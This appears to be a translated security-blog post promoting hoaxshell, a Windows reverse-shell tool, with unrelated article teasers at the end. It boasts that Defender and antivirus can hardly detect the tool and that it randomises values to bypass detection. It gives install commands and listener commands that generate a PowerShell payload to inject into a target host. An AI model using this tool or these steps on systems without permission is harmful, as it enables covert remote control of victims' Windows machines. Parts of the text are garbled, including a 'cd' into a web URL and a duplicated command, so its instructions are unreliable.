hoaxshell: a powerful non-traditional Windows reverse shell

0 23
About hoaxshellhoaxshell is a powerful non-traditional Windows reverse shell. Th...

About hoaxshell

hoaxshell is a powerful non-traditional Windows reverse shell. The current version of Microsoft Defender and some antivirus solutions can hardly detect the existence of hoaxshell. The tool is easy to use and can not only generate its own PowerShell Payload but also support encryption (SSL), which can help researchers test the security of Windows systems.

The current version of hoaxshell has been tested on the latest Windows 11 Enterprise Edition and Windows 10 Professional Edition.

Tool Download

hoaxshell: a powerful non-traditional Windows reverse shell

Researchers can use the following commands to clone the source code of this project locally, install the other dependent components required by the tool using pip3 and the provided requirements.txt, and finally provide executable permissions to hoaxshell.py:

git clone https://github.com/t3l3machus/hoaxshell

cd https://www.freebuf.com/articles/system/hoaxshell

sudo pip3 install -r requirements.txt

chmod +x hoaxshell.py

chmod +x hoaxshell.py

Tool Usage

Note: As a method to bypass security detection, hoaxshell will automatically generate random values for session id, URL path, and the names of custom http headers used in the process each time the script is started. The generated Payload will only be applicable to the instance for which it was generated. We can use the -g option to disable this feature and re-establish an active session, or use a new hoaxshell instance to reuse the previously generated Payload.

Generate basic Shell session via http

sudo python3 hoaxshell.py -s <your_ip>

When you run hoaxshell, it will generate its own PowerShell Payload to inject into the target host. By default, for convenience, Payload uses base64 encoding. If you need the original Payload, you can use the 'raw*payload' command or the '-r' parameter. After the Payload runs on the target device, we can run PowerShell commands on it.

Encrypt Shell Session (https)

# Generate self-signed certificate:

# Pass cert.pem and key.pem as parameters:

sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>

The length of the generated PowerShell Payload will be longer because there is a piece of code that needs to disable ssl certificate verification.

Resume Session Mode

If you accidentally close the terminal, you can also restart hoaxshell through the 'Resume Session Mode', which will re-establish the session, but the prerequisite is that our Payload is still running on the target device:

sudo python3 hoaxshell.py -s <your_ip> -g

Tool Operation Screenshot

Windows 10 Testing

Windows 11 Testing

Tool Demonstration Video

Video Addresshttps://www.you*tube.com/watch?v=SEufgD5UxdU

License Agreement

The development and release of this project followBSD-2-ClauseOpen Source License Agreement.

Project Address

hoaxshell:【GitHub Gateway


你可能想看:

As announced today, Glupteba is a multi-component botnet targeting Windows computers. Google has taken action to disrupt the operation of Glupteba, and we believe this action will have a significant i

Analysis of Windows spyware, will you still easily download Windows crack software?

2021-Digital China Innovation Competition-Huifu Cybersecurity Track-Final-Web-hatenum and source code analysis and payload script analysis

(3) Is the national secret OTP simply replacing the SHA series hash algorithms with the SM3 algorithm, and becoming the national secret version of HOTP and TOTP according to the adopted dynamic factor

d) Adopt identification technologies such as passwords, password technologies, biometric technologies, and combinations of two or more to identify users, and at least one identification technology sho

Distributed Storage Technology (Part 2): Analysis of the architecture, principles, characteristics, and advantages and disadvantages of wide-column storage and full-text search engines

b) It should have the login failure handling function, and should configure and enable measures such as ending the session, limiting the number of illegal logins, and automatically exiting when the lo

4.5 Main person in charge reviews the simulation results, sorts out the separated simulation issues, and allows the red and blue teams to improve as soon as possible. The main issues are as follows

Announcement regarding the addition of 7 units as technical support units for the Ministry of Industry and Information Technology's mobile Internet APP product security vulnerability database

In today's rapidly developing digital economy, data has become an important engine driving social progress and enterprise development. From being initially regarded as part of intangible assets to now

最后修改时间:
admin
上一篇 2025年03月29日 14:16
下一篇 2025年03月29日 14:39

评论已关闭